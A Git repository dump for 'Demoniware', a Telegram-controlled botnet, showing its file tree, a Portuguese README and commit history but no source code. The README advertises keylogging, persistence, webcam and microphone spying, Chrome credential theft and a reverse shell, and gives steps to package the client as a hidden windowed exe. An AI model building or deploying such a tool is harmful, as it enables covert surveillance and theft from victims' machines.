======================: FILES :======================
Demoniware
├── chrome.ico
├── demoniware.py
├── generate.py
├── plugins
│   ├── camera.py
│   ├── chrome.py
│   ├── __init__.py
│   ├── keylogger.py
│   ├── microphone.py
│   ├── packet_forger.py
│   ├── persistence.py
│   ├── proc.py
│   ├── reverse_shell.py
│   ├── screenshot.py
│   ├── suicide.py
│   ├── system.py
│   └── upload.py
├── README.md
├── renovate.json
├── requirements.txt
└── util
    ├── rev_cam_server.py
    └── rev_mic_server.py

2 directories, 21 files
======================: README CONTENT :======================
# Demoniware
Telegram BotNet

- Controle de múltiplos hosts com uma única chave API do Telegram;
- Dowload de arquivos através do recebimento de arquivos nativo do Telegram;
- Upload de arquivos através do envio de arquivos nativo do Telegram;
- Execução de comandos nativos do sistema;
- Informações do S.O;
- Informações de IP;
- Informações de Geolocalização baseado no endereço IP;
- Listagem de diretórios e arquivos utilizando expressão regular;
- Keylogger que pode ser habilitado e desabilitado quando necessário;
- Malware persistente (Windows);
- Listar webcams por ID;
- Utilização da webcam para tirar fotos;
- Utilização do microfone para gravar audio;
- PrintScreen;
- Listar processos;
- Matar processos pelo PID;
- Coleta credenciais armazenadas no Google Chrome;
- Gerar par de chaves RSA;
- Assinar comando com chave privada RSA;
- Reverse Shell;
- Reverse webcam streaming;

#Instalar OpenCV Windows
http://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_setup/py_setup_in_windows/py_setup_in_windows.html

#Instalar Visual C++ Compiler
https://www.microsoft.com/en-us/download/details.aspx?id=44266

#Instalar dependencias 
pip install -r dependencies.txt

# Gerar exe
pyinstaller --onefile --windowed --hidden-import=queue --icon='icone.ico'(Optional) Demoniware.py

# Gerar RSA chaves.
python generate.py create

# Assinar comandos, Ex.
python generate.py "hostname /snapshot 0"

#Time
<pre>
Matheus Bernardes a.k.a <a href="http://pythonicos.com.br">Gambler</a>
Henrique Gonçalves a.k.a. <a href="https://github.com/kamushadenes">Kamus Hadenes</a>
Breno Tamburi a.k.a c0ringa
</pre>
====================== GIT HISTORY: ======================
bf2a031 HEAD@{0}: clone: from https://github.com/mthbernardes/Demoniware
commit bf2a031c7d881e76606ac8bc165f0acbf72b97dc
Merge: 1781fb9 155fee9
Author: Matheus Bernardes <12648924+mthbernardes@users.noreply.github.com>
Date:   Mon Aug 16 10:37:34 2021 -0300

    Merge pull request #20 from mthbernardes/dependabot/pip/psutil-5.6.6
    
    Bump psutil from 4.3.1 to 5.6.6

commit 1781fb9dcc5efe62ab4973f27d70023a0b7035c1
Merge: 0f080d2 7a90758
Author: Matheus Bernardes <12648924+mthbernardes@users.noreply.github.com>
Date:   Mon Aug 16 10:37:23 2021 -0300

    Merge pull request #22 from mthbernardes/dependabot/pip/pyinstaller-3.6
    
    Bump pyinstaller from 3.1.1 to 3.6

commit 0f080d25d8eb4d2092cae828b4b383a6322f7876
Merge: 8b084ce 37125bd
Author: Matheus Bernardes <12648924+mthbernardes@users.noreply.github.com>
Date:   Mon Aug 16 10:37:15 2021 -0300

    Merge pull request #29 from mthbernardes/dependabot/pip/requests-2.20.0
    
    Bump requests from 2.11.1 to 2.20.0

commit 8b084ced8661be4d10f5a0e35251aac93fcf1227
Merge: c7dccf9 3ff2e17
Author: Matheus Bernardes <12648924+mthbernardes@users.noreply.github.com>
Date:   Mon Aug 16 10:35:03 2021 -0300

    Merge pull request #25 from mthbernardes/renovate/configure
    
    Configure Renovate

commit 155fee9ef931bc0cbf4d22446a34dfc95daff353
Author: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Date:   Mon Aug 16 13:33:56 2021 +0000

    Bump psutil from 4.3.1 to 5.6.6
    
    Bumps [psutil](https://github.com/giampaolo/psutil) from 4.3.1 to 5.6.6.
    - [Release notes](https://github.com/giampaolo/psutil/releases)
    - [Changelog](https://github.com/giampaolo/psutil/blob/master/HISTORY.rst)
    - [Commits](https://github.com/giampaolo/psutil/compare/release-4.3.1...release-5.6.6)
    
    Signed-off-by: dependabot[bot] <support@github.com>

commit 37125bdfae8ea2d48b54ae8399c2c81f2ecd33a0
Author: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Date:   Mon Aug 16 13:33:15 2021 +0000

    Bump requests from 2.11.1 to 2.20.0
    
    Bumps [requests](https://github.com/psf/requests) from 2.11.1 to 2.20.0.
    - [Release notes](https://github.com/psf/requests/releases)
    - [Changelog](https://github.com/psf/requests/blob/main/HISTORY.md)
    - [Commits](https://github.com/psf/requests/compare/v2.11.1...v2.20.0)
    
    ---
    updated-dependencies:
    - dependency-name: requests
      dependency-type: direct:production
    ...
    
    Signed-off-by: dependabot[bot] <support@github.com>

commit c7dccf9f7a5b72ed83d1a9fff5f15375fc8d2cc4
Merge: 888ef07 9693f39
Author: Matheus Bernardes <12648924+mthbernardes@users.noreply.github.com>
Date:   Mon Aug 16 10:32:51 2021 -0300

    Merge pull request #28 from mthbernardes/dependabot/pip/pillow-8.2.0
    
    Bump pillow from 3.3.1 to 8.2.0

commit 888ef0712ff35c7fbc546ceed5b9dba2e408623a
Merge: 33edb11 58861d0
Author: Matheus Bernardes <12648924+mthbernardes@users.noreply.github.com>
Date:   Mon Aug 16 10:32:43 2021 -0300

    Merge pull request #27 from mthbernardes/dependabot/pip/urllib3-1.26.5
    
    Bump urllib3 from 1.17 to 1.26.5

commit 9693f392fa133974878e2b48f3b95d172ec2af2e
Author: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Date:   Tue Jun 8 19:43:01 2021 +0000

    Bump pillow from 3.3.1 to 8.2.0
    
    Bumps [pillow](https://github.com/python-pillow/Pillow) from 3.3.1 to 8.2.0.
    - [Release notes](https://github.com/python-pillow/Pillow/releases)
    - [Changelog](https://github.com/python-pillow/Pillow/blob/master/CHANGES.rst)
    - [Commits](https://github.com/python-pillow/Pillow/compare/3.3.1...8.2.0)
    
    ---
    updated-dependencies:
    - dependency-name: pillow
      dependency-type: direct:production
    ...
    
    Signed-off-by: dependabot[bot] <support@github.com>

commit 58861d0e6c0d4ace154f73ccc9fda08424d23098
Author: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Date:   Tue Jun 1 22:07:33 2021 +0000

    Bump urllib3 from 1.17 to 1.26.5
    
    Bumps [urllib3](https://github.com/urllib3/urllib3) from 1.17 to 1.26.5.
    - [Release notes](https://github.com/urllib3/urllib3/releases)
    - [Changelog](https://github.com/urllib3/urllib3/blob/main/CHANGES.rst)
    - [Commits](https://github.com/urllib3/urllib3/compare/1.17...1.26.5)
    
    ---
    updated-dependencies:
    - dependency-name: urllib3
      dependency-type: direct:production
    ...
    
    Signed-off-by: dependabot[bot] <support@github.com>

commit 3ff2e17b70dae1c0fdf912607377890beaf2c197
Author: Renovate Bot <bot@renovateapp.com>
Date:   Tue Dec 15 18:42:03 2020 +0000

    Add renovate.json

commit 7a907584c3af501544ca5836f042ab269fc052fe
Author: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Date:   Tue Dec 15 12:42:35 2020 +0000

    Bump pyinstaller from 3.1.1 to 3.6
    
    Bumps [pyinstaller](https://github.com/pyinstaller/pyinstaller) from 3.1.1 to 3.6.
    - [Release notes](https://github.com/pyinstaller/pyinstaller/releases)
    - [Changelog](https://github.com/pyinstaller/pyinstaller/blob/develop/doc/CHANGES-3.rst)
    - [Commits](https://github.com/pyinstaller/pyinstaller/compare/v3.1.1...v3.6)
    
    Signed-off-by: dependabot[bot] <support@github.com>

commit 33edb118f210e6f2ac4f354d19a8110e0b8dccf2
Author: Matheus Bernardes <gambler@tutanota.com>
Date:   Thu Sep 29 12:00:59 2016 -0300

    Problems

commit a3402c8e38fdc3bebfcaeed7678517d771404a4e
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Thu Sep 29 11:59:32 2016 -0300

    Update packet_forger.py

commit 95a7a7f7fb5cad6e60fab452a10b984f0a78ea88
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Thu Sep 29 11:32:59 2016 -0300

    Update requirements.txt

commit 2fe6e531fde6617268abc8922bce428b90655fdf
Merge: 4d701ba ac703b1
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Thu Sep 29 00:21:52 2016 -0300

    Merge pull request #16 from kamushadenes/master
    
    Automatic commit message

commit ac703b1575e3ca85350ce467a13dc5337f7ab8cb
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Wed Sep 28 23:45:05 2016 -0300

    Automatic commit message

commit 4d701ba2205cd5cf402f6a4acaa9ecfcba84307f
Merge: ad17a8b 90ede49
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Tue Sep 27 15:52:18 2016 -0300

    Merge pull request #15 from kamushadenes/master
    
    Add packet_forger plugin

commit 90ede4979045c5fa7f64630fc31d5b289adb4c4e
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Sat Sep 24 04:57:34 2016 -0300

    Add packet_forger plugin

commit ad17a8bac12424fe08a36f926c5199b76312366f
Merge: f60c787 f32971e
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sat Sep 24 01:42:47 2016 -0300

    Merge pull request #14 from kamushadenes/master
    
    Automatic commit message

commit f32971e0a09ad6cd56d6a650cbbee585654e4e4c
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Sat Sep 24 01:40:14 2016 -0300

    Automatic commit message

commit f60c78707653c41496175c999c2e1f6c1bc945b3
Merge: 02417eb a8c2a31
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sat Sep 24 01:26:30 2016 -0300

    Merge pull request #13 from kamushadenes/master
    
    Automatic commit message

commit a8c2a319a02a17e6197a573c8625dd22c395eb1e
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Sat Sep 24 01:25:43 2016 -0300

    Automatic commit message

commit 02417ebedeb45e41768510e57820ef3a1ec13d3e
Merge: 3b89f29 6692bfb
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sat Sep 24 01:19:13 2016 -0300

    Merge pull request #12 from kamushadenes/master
    
    Fix mic stream

commit 6692bfb3ce184b7b2463ed903ba830a3ba5f115f
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Sat Sep 24 01:17:59 2016 -0300

    Fix mic stream

commit 3b89f29c51c9af6b338588551bef2a8adca77833
Merge: d971a53 8629b54
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sat Sep 24 00:59:55 2016 -0300

    Merge pull request #11 from kamushadenes/master
    
    Fix /mic_stream noise

commit 8629b542fc397e0e9e34eb7c987527a9b7cc8018
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Sat Sep 24 00:58:16 2016 -0300

    Fix /mic_stream noise

commit d971a53df36454328d8734dd8787f7343d0539c9
Merge: 89292e5 b70f94d
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sat Sep 24 00:52:56 2016 -0300

    Merge pull request #10 from kamushadenes/master
    
    Add /mic_stream

commit b70f94d07d00d12d55535744c687dbf66891a12c
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Sat Sep 24 00:51:33 2016 -0300

    Add /mic_stream

commit 89292e5ff73e210fb878adedc844abfdd9756b69
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sat Sep 24 00:30:59 2016 -0300

    Update README.md

commit d64a2fa927960fa0cf69eb8b80e0d561cc43e11d
Merge: debc082 185faa4
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sat Sep 24 00:19:29 2016 -0300

    Merge pull request #9 from kamushadenes/master
    
    Remove demoniware_single.py, change /hosts reply

commit 185faa4b6a27fd3837c78f4192e10377a2e1f875
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 23:53:37 2016 -0300

    Automatic commit message

commit bc56789b616b87999f308ccdb6584ac1372800b3
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 23:53:24 2016 -0300

    Automatic commit message

commit debc082248acbb431a3543748add124057d4b179
Merge: bd23c92 7324a0a
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Fri Sep 23 23:42:48 2016 -0300

    Merge pull request #8 from kamushadenes/master
    
    Automatic commit message

commit 7324a0a15048d8db1cdd1434ec88c8d5108f5e77
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 23:36:54 2016 -0300

    Automatic commit message

commit bd23c9277f308db61fa3b76c290397807f452fd9
Merge: b14808e 864ecb8
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Fri Sep 23 23:31:46 2016 -0300

    Merge pull request #7 from kamushadenes/master
    
            Rollback Windows camera support

commit 864ecb8102c5a3e6ae2dadfca2abcc8240c55887
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 23:29:54 2016 -0300

    Rollback Windows camera support

commit 04e7a9c944eaa0e97c52416dfe73c82462157e0f
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 22:44:12 2016 -0300

    Test

commit b14808e8429501afe017ed95f92e82c212e8eacf
Merge: 28de224 bc13540
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Fri Sep 23 22:34:01 2016 -0300

    Merge pull request #6 from kamushadenes/master
    
    Fuck Windows

commit bc1354032141df36397f1bcc9a1a4b3174c6ecc6
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 22:33:01 2016 -0300

    Fuck Windows

commit 28de2243939d829ea93f823cf55f5021fa389b5e
Merge: 2a555d5 842f4d4
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Fri Sep 23 22:06:30 2016 -0300

    Merge pull request #5 from kamushadenes/master
    
    Add static import of plugins to deal with pyinstaller issues

commit 842f4d4a41d6ddfae9457fbe7bd75e418345d887
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 22:02:08 2016 -0300

    Add static import of plugins to deal with pyinstaller issues

commit 2a555d5abf2f1e7319498315d6be3293f3ae6886
Merge: d71d8e5 4aa851e
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Fri Sep 23 21:19:19 2016 -0300

    Merge pull request #4 from kamushadenes/master
    
    Automatic commit message

commit 4aa851e1f1f50334dc1cff18358ffec37119cfcb
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 21:17:25 2016 -0300

    Automatic commit message

commit d71d8e5d70ae1965b95e4b6f3ad11f1737c45f46
Merge: 7a02049 49e6e4c
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Fri Sep 23 21:13:54 2016 -0300

    Merge pull request #3 from kamushadenes/master
    
    New features and configparser removal

commit 49e6e4c5a688705cab5c391a8a1ad35d5a6682cf
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 21:11:36 2016 -0300

    Fix /chrome_data

commit 7a02049e91d91d15f0987e9626565be22077d554
Merge: f08a656 4781fd8
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Fri Sep 23 21:02:35 2016 -0300

    Merge pull request #2 from kamushadenes/master
    
    New features and configparser removal

commit 4781fd8e01c206833b46af091217753b9d0ef38a
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 20:59:27 2016 -0300

    Remove configparser and demoniware.ini due to pyinstaller issues

commit 29c2b557d7a1bdb127d6475429b3f8cb31a0af18
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 20:54:24 2016 -0300

    Fix /process and /suicide

commit f0d34f29da0121fb30765802a4d7e639a3add24e
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 20:47:15 2016 -0300

    Add /accept_download command

commit f08a656ca87ce8f3e48ec85082aa6dda45d90f9f
Merge: 78c5407 88b9565
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Fri Sep 23 20:26:20 2016 -0300

    Merge pull request #1 from kamushadenes/master
    
    Code rewrite and improvements

commit 88b9565e6db86c92e692acb0ef8ca22beeaf88a9
Author: Kamus Hadenes <kamushadenes@hyadesinc.com>
Date:   Fri Sep 23 20:22:14 2016 -0300

    Code rewrite and improvements
    
    - Add message pagination to comply with Telegram 4096 character limit
    - Add unique identifier for infected machines, since hostnames can be duplicated
    - Add support for Linux screenshots by replacing PIL/Pillow with pyscreenshot
    - Add some abstractions like get_tmp()
    - Add filtering capabilities to /process
    - Add plugin system, all current functions migrated to plugins
    - Add optional delay parameter to screenshot plugin
    - Add camera /snapshot support to Linux
    - Add Linux support for /cameras listing
    - Fix camera streaming on all platforms and handle errors gracefully
    
    - Rewrite code as class
    - PEP8 Compliance (mostly)
    - Basic parameter validation
    - Replace string concatenation with format() function or os.path.join(), where applicable
    - General code improvements in readability and performance
    - Replace usages of reserved keywords with other names
    - get_tmp() uses tempdir.gettempdir() to determine the most suitable temporary directory across platforms
    - Messages translated to english for broader reach
    - Add logging system

commit 78c5407d9cb32320f6e54bdfd0d28e1579b2bdc1
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Thu Sep 22 08:33:45 2016 -0300

    Create README.md

commit 1607a4444bb41665f04ee99959de6ce5d61476c3
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Thu Sep 22 08:30:15 2016 -0300

    Delete README.md

commit 85c9577ec9944f71d88b90615da793ffbd171f9c
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Thu Sep 22 08:29:43 2016 -0300

    Update Demoniware.py

commit e0f74f9b16cb6bc6a54490ad47093225e1f5cf21
Author: Matheus Bernardes <matheusbernardes@nbvt02.vtc.local>
Date:   Thu Sep 22 08:27:16 2016 -0300

    Demoniware

commit 49f21e2c97abbcc01f1462a093b788f536d61e61
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Tue Jul 5 11:49:08 2016 -0300

    Update README.md

commit 18160e36d36622e4b3abe7aa4aa34043d19bb481
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sun Jul 3 23:04:15 2016 -0300

    Create README.md

commit b1cbc4c7fcbed657fb8e1f4dd9a595aafbafc745
Author: Matheus Bernardes <matheus.bernardes@pythonicos.com.br>
Date:   Sun Jul 3 22:59:46 2016 -0300

    Initial commit
